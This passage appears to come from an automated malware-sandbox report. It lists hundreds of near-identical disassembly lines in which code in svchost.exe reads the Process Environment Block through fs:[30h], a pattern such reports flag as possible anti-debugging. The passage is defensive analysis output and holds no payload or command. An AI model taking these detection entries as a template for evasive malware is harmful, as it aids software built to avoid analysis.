            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E12ED mov eax, dword ptr fs:[00000030h]2_2_031E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E12ED mov eax, dword ptr fs:[00000030h]2_2_031E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E12ED mov eax, dword ptr fs:[00000030h]2_2_031E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E12ED mov eax, dword ptr fs:[00000030h]2_2_031E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E12ED mov eax, dword ptr fs:[00000030h]2_2_031E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031402E1 mov eax, dword ptr fs:[00000030h]2_2_031402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031402E1 mov eax, dword ptr fs:[00000030h]2_2_031402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031402E1 mov eax, dword ptr fs:[00000030h]2_2_031402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DA118 mov ecx, dword ptr fs:[00000030h]2_2_031DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DA118 mov eax, dword ptr fs:[00000030h]2_2_031DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DA118 mov eax, dword ptr fs:[00000030h]2_2_031DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DA118 mov eax, dword ptr fs:[00000030h]2_2_031DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F0115 mov eax, dword ptr fs:[00000030h]2_2_031F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03131131 mov eax, dword ptr fs:[00000030h]2_2_03131131
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03131131 mov eax, dword ptr fs:[00000030h]2_2_03131131
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312B136 mov eax, dword ptr fs:[00000030h]2_2_0312B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312B136 mov eax, dword ptr fs:[00000030h]2_2_0312B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312B136 mov eax, dword ptr fs:[00000030h]2_2_0312B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312B136 mov eax, dword ptr fs:[00000030h]2_2_0312B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03160124 mov eax, dword ptr fs:[00000030h]2_2_03160124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03137152 mov eax, dword ptr fs:[00000030h]2_2_03137152
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312C156 mov eax, dword ptr fs:[00000030h]2_2_0312C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C8158 mov eax, dword ptr fs:[00000030h]2_2_031C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03136154 mov eax, dword ptr fs:[00000030h]2_2_03136154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03136154 mov eax, dword ptr fs:[00000030h]2_2_03136154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C4144 mov eax, dword ptr fs:[00000030h]2_2_031C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C4144 mov eax, dword ptr fs:[00000030h]2_2_031C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C4144 mov ecx, dword ptr fs:[00000030h]2_2_031C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C4144 mov eax, dword ptr fs:[00000030h]2_2_031C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C4144 mov eax, dword ptr fs:[00000030h]2_2_031C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03129148 mov eax, dword ptr fs:[00000030h]2_2_03129148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03129148 mov eax, dword ptr fs:[00000030h]2_2_03129148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03129148 mov eax, dword ptr fs:[00000030h]2_2_03129148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03129148 mov eax, dword ptr fs:[00000030h]2_2_03129148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C3140 mov eax, dword ptr fs:[00000030h]2_2_031C3140
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C3140 mov eax, dword ptr fs:[00000030h]2_2_031C3140
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C3140 mov eax, dword ptr fs:[00000030h]2_2_031C3140
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312F172 mov eax, dword ptr fs:[00000030h]2_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312F172 mov eax, dword ptr fs:[00000030h]2_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312F172 mov eax, dword ptr fs:[00000030h]2_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312F172 mov eax, dword ptr fs:[00000030h]2_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312F172 mov eax, dword ptr fs:[00000030h]2_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312F172 mov eax, dword ptr fs:[00000030h]2_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312F172 mov eax, dword ptr fs:[00000030h]2_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312F172 mov eax, dword ptr fs:[00000030h]2_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312F172 mov eax, dword ptr fs:[00000030h]2_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312F172 mov eax, dword ptr fs:[00000030h]2_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312F172 mov eax, dword ptr fs:[00000030h]2_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312F172 mov eax, dword ptr fs:[00000030h]2_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312F172 mov eax, dword ptr fs:[00000030h]2_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312F172 mov eax, dword ptr fs:[00000030h]2_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312F172 mov eax, dword ptr fs:[00000030h]2_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312F172 mov eax, dword ptr fs:[00000030h]2_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312F172 mov eax, dword ptr fs:[00000030h]2_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312F172 mov eax, dword ptr fs:[00000030h]2_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312F172 mov eax, dword ptr fs:[00000030h]2_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312F172 mov eax, dword ptr fs:[00000030h]2_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312F172 mov eax, dword ptr fs:[00000030h]2_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C9179 mov eax, dword ptr fs:[00000030h]2_2_031C9179
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03205152 mov eax, dword ptr fs:[00000030h]2_2_03205152
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B019F mov eax, dword ptr fs:[00000030h]2_2_031B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B019F mov eax, dword ptr fs:[00000030h]2_2_031B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B019F mov eax, dword ptr fs:[00000030h]2_2_031B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B019F mov eax, dword ptr fs:[00000030h]2_2_031B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312A197 mov eax, dword ptr fs:[00000030h]2_2_0312A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312A197 mov eax, dword ptr fs:[00000030h]2_2_0312A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312A197 mov eax, dword ptr fs:[00000030h]2_2_0312A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03187190 mov eax, dword ptr fs:[00000030h]2_2_03187190
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03170185 mov eax, dword ptr fs:[00000030h]2_2_03170185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031EC188 mov eax, dword ptr fs:[00000030h]2_2_031EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031EC188 mov eax, dword ptr fs:[00000030h]2_2_031EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314B1B0 mov eax, dword ptr fs:[00000030h]2_2_0314B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E11A4 mov eax, dword ptr fs:[00000030h]2_2_031E11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E11A4 mov eax, dword ptr fs:[00000030h]2_2_031E11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E11A4 mov eax, dword ptr fs:[00000030h]2_2_031E11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E11A4 mov eax, dword ptr fs:[00000030h]2_2_031E11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032061E5 mov eax, dword ptr fs:[00000030h]2_2_032061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316D1D0 mov eax, dword ptr fs:[00000030h]2_2_0316D1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316D1D0 mov ecx, dword ptr fs:[00000030h]2_2_0316D1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AE1D0 mov eax, dword ptr fs:[00000030h]2_2_031AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AE1D0 mov eax, dword ptr fs:[00000030h]2_2_031AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_031AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AE1D0 mov eax, dword ptr fs:[00000030h]2_2_031AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AE1D0 mov eax, dword ptr fs:[00000030h]2_2_031AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F61C3 mov eax, dword ptr fs:[00000030h]2_2_031F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F61C3 mov eax, dword ptr fs:[00000030h]2_2_031F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031D71F9 mov esi, dword ptr fs:[00000030h]2_2_031D71F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032051CB mov eax, dword ptr fs:[00000030h]2_2_032051CB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031601F8 mov eax, dword ptr fs:[00000030h]2_2_031601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031551EF mov eax, dword ptr fs:[00000030h]2_2_031551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031551EF mov eax, dword ptr fs:[00000030h]2_2_031551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031551EF mov eax, dword ptr fs:[00000030h]2_2_031551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031551EF mov eax, dword ptr fs:[00000030h]2_2_031551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031551EF mov eax, dword ptr fs:[00000030h]2_2_031551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031551EF mov eax, dword ptr fs:[00000030h]2_2_031551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031551EF mov eax, dword ptr fs:[00000030h]2_2_031551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031551EF mov eax, dword ptr fs:[00000030h]2_2_031551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031551EF mov eax, dword ptr fs:[00000030h]2_2_031551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031551EF mov eax, dword ptr fs:[00000030h]2_2_031551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031551EF mov eax, dword ptr fs:[00000030h]2_2_031551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031551EF mov eax, dword ptr fs:[00000030h]2_2_031551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031551EF mov eax, dword ptr fs:[00000030h]2_2_031551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031351ED mov eax, dword ptr fs:[00000030h]2_2_031351ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314E016 mov eax, dword ptr fs:[00000030h]2_2_0314E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314E016 mov eax, dword ptr fs:[00000030h]2_2_0314E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314E016 mov eax, dword ptr fs:[00000030h]2_2_0314E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314E016 mov eax, dword ptr fs:[00000030h]2_2_0314E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B4000 mov ecx, dword ptr fs:[00000030h]2_2_031B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F903E mov eax, dword ptr fs:[00000030h]2_2_031F903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F903E mov eax, dword ptr fs:[00000030h]2_2_031F903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F903E mov eax, dword ptr fs:[00000030h]2_2_031F903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F903E mov eax, dword ptr fs:[00000030h]2_2_031F903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C6030 mov eax, dword ptr fs:[00000030h]2_2_031C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312A020 mov eax, dword ptr fs:[00000030h]2_2_0312A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312C020 mov eax, dword ptr fs:[00000030h]2_2_0312C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03205060 mov eax, dword ptr fs:[00000030h]2_2_03205060
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03132050 mov eax, dword ptr fs:[00000030h]2_2_03132050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031D705E mov ebx, dword ptr fs:[00000030h]2_2_031D705E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031D705E mov eax, dword ptr fs:[00000030h]2_2_031D705E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315B052 mov eax, dword ptr fs:[00000030h]2_2_0315B052
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B6050 mov eax, dword ptr fs:[00000030h]2_2_031B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03141070 mov eax, dword ptr fs:[00000030h]2_2_03141070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03141070 mov ecx, dword ptr fs:[00000030h]2_2_03141070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03141070 mov eax, dword ptr fs:[00000030h]2_2_03141070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03141070 mov eax, dword ptr fs:[00000030h]2_2_03141070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03141070 mov eax, dword ptr fs:[00000030h]2_2_03141070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03141070 mov eax, dword ptr fs:[00000030h]2_2_03141070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03141070 mov eax, dword ptr fs:[00000030h]2_2_03141070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03141070 mov eax, dword ptr fs:[00000030h]2_2_03141070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03141070 mov eax, dword ptr fs:[00000030h]2_2_03141070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03141070 mov eax, dword ptr fs:[00000030h]2_2_03141070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03141070 mov eax, dword ptr fs:[00000030h]2_2_03141070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03141070 mov eax, dword ptr fs:[00000030h]2_2_03141070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03141070 mov eax, dword ptr fs:[00000030h]2_2_03141070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315C073 mov eax, dword ptr fs:[00000030h]2_2_0315C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AD070 mov ecx, dword ptr fs:[00000030h]2_2_031AD070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B106E mov eax, dword ptr fs:[00000030h]2_2_031B106E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03135096 mov eax, dword ptr fs:[00000030h]2_2_03135096
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315D090 mov eax, dword ptr fs:[00000030h]2_2_0315D090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315D090 mov eax, dword ptr fs:[00000030h]2_2_0315D090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316909C mov eax, dword ptr fs:[00000030h]2_2_0316909C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313208A mov eax, dword ptr fs:[00000030h]2_2_0313208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031BD080 mov eax, dword ptr fs:[00000030h]2_2_031BD080
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031BD080 mov eax, dword ptr fs:[00000030h]2_2_031BD080
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312D08D mov eax, dword ptr fs:[00000030h]2_2_0312D08D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F60B8 mov eax, dword ptr fs:[00000030h]2_2_031F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F60B8 mov ecx, dword ptr fs:[00000030h]2_2_031F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C80A8 mov eax, dword ptr fs:[00000030h]2_2_031C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B20DE mov eax, dword ptr fs:[00000030h]2_2_031B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031590DB mov eax, dword ptr fs:[00000030h]2_2_031590DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031470C0 mov eax, dword ptr fs:[00000030h]2_2_031470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031470C0 mov ecx, dword ptr fs:[00000030h]2_2_031470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031470C0 mov ecx, dword ptr fs:[00000030h]2_2_031470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031470C0 mov eax, dword ptr fs:[00000030h]2_2_031470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031470C0 mov ecx, dword ptr fs:[00000030h]2_2_031470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031470C0 mov ecx, dword ptr fs:[00000030h]2_2_031470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031470C0 mov eax, dword ptr fs:[00000030h]2_2_031470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031470C0 mov eax, dword ptr fs:[00000030h]2_2_031470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031470C0 mov eax, dword ptr fs:[00000030h]2_2_031470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031470C0 mov eax, dword ptr fs:[00000030h]2_2_031470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031470C0 mov eax, dword ptr fs:[00000030h]2_2_031470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031470C0 mov eax, dword ptr fs:[00000030h]2_2_031470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031470C0 mov eax, dword ptr fs:[00000030h]2_2_031470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031470C0 mov eax, dword ptr fs:[00000030h]2_2_031470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031470C0 mov eax, dword ptr fs:[00000030h]2_2_031470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031470C0 mov eax, dword ptr fs:[00000030h]2_2_031470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031470C0 mov eax, dword ptr fs:[00000030h]2_2_031470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031470C0 mov eax, dword ptr fs:[00000030h]2_2_031470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AD0C0 mov eax, dword ptr fs:[00000030h]2_2_031AD0C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AD0C0 mov eax, dword ptr fs:[00000030h]2_2_031AD0C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312C0F0 mov eax, dword ptr fs:[00000030h]2_2_0312C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031720F0 mov ecx, dword ptr fs:[00000030h]2_2_031720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031550E4 mov eax, dword ptr fs:[00000030h]2_2_031550E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031550E4 mov ecx, dword ptr fs:[00000030h]2_2_031550E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0312A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032050D9 mov eax, dword ptr fs:[00000030h]2_2_032050D9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031380E9 mov eax, dword ptr fs:[00000030h]2_2_031380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B60E0 mov eax, dword ptr fs:[00000030h]2_2_031B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03130710 mov eax, dword ptr fs:[00000030h]2_2_03130710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03160710 mov eax, dword ptr fs:[00000030h]2_2_03160710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316F71F mov eax, dword ptr fs:[00000030h]2_2_0316F71F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316F71F mov eax, dword ptr fs:[00000030h]2_2_0316F71F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03137703 mov eax, dword ptr fs:[00000030h]2_2_03137703
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03135702 mov eax, dword ptr fs:[00000030h]2_2_03135702
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03135702 mov eax, dword ptr fs:[00000030h]2_2_03135702
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316C700 mov eax, dword ptr fs:[00000030h]2_2_0316C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0320B73C mov eax, dword ptr fs:[00000030h]2_2_0320B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0320B73C mov eax, dword ptr fs:[00000030h]2_2_0320B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0320B73C mov eax, dword ptr fs:[00000030h]2_2_0320B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0320B73C mov eax, dword ptr fs:[00000030h]2_2_0320B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03129730 mov eax, dword ptr fs:[00000030h]2_2_03129730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03129730 mov eax, dword ptr fs:[00000030h]2_2_03129730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03165734 mov eax, dword ptr fs:[00000030h]2_2_03165734
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313973A mov eax, dword ptr fs:[00000030h]2_2_0313973A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313973A mov eax, dword ptr fs:[00000030h]2_2_0313973A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316273C mov eax, dword ptr fs:[00000030h]2_2_0316273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316273C mov ecx, dword ptr fs:[00000030h]2_2_0316273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316273C mov eax, dword ptr fs:[00000030h]2_2_0316273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AC730 mov eax, dword ptr fs:[00000030h]2_2_031AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031EF72E mov eax, dword ptr fs:[00000030h]2_2_031EF72E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03133720 mov eax, dword ptr fs:[00000030h]2_2_03133720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314F720 mov eax, dword ptr fs:[00000030h]2_2_0314F720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314F720 mov eax, dword ptr fs:[00000030h]2_2_0314F720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314F720 mov eax, dword ptr fs:[00000030h]2_2_0314F720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F972B mov eax, dword ptr fs:[00000030h]2_2_031F972B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316C720 mov eax, dword ptr fs:[00000030h]2_2_0316C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316C720 mov eax, dword ptr fs:[00000030h]2_2_0316C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03130750 mov eax, dword ptr fs:[00000030h]2_2_03130750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031BE75D mov eax, dword ptr fs:[00000030h]2_2_031BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172750 mov eax, dword ptr fs:[00000030h]2_2_03172750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172750 mov eax, dword ptr fs:[00000030h]2_2_03172750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B4755 mov eax, dword ptr fs:[00000030h]2_2_031B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03143740 mov eax, dword ptr fs:[00000030h]2_2_03143740
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03143740 mov eax, dword ptr fs:[00000030h]2_2_03143740
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03143740 mov eax, dword ptr fs:[00000030h]2_2_03143740
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316674D mov esi, dword ptr fs:[00000030h]2_2_0316674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316674D mov eax, dword ptr fs:[00000030h]2_2_0316674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316674D mov eax, dword ptr fs:[00000030h]2_2_0316674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03138770 mov eax, dword ptr fs:[00000030h]2_2_03138770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]2_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]2_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]2_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]2_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]2_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]2_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]2_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]2_2_03140770
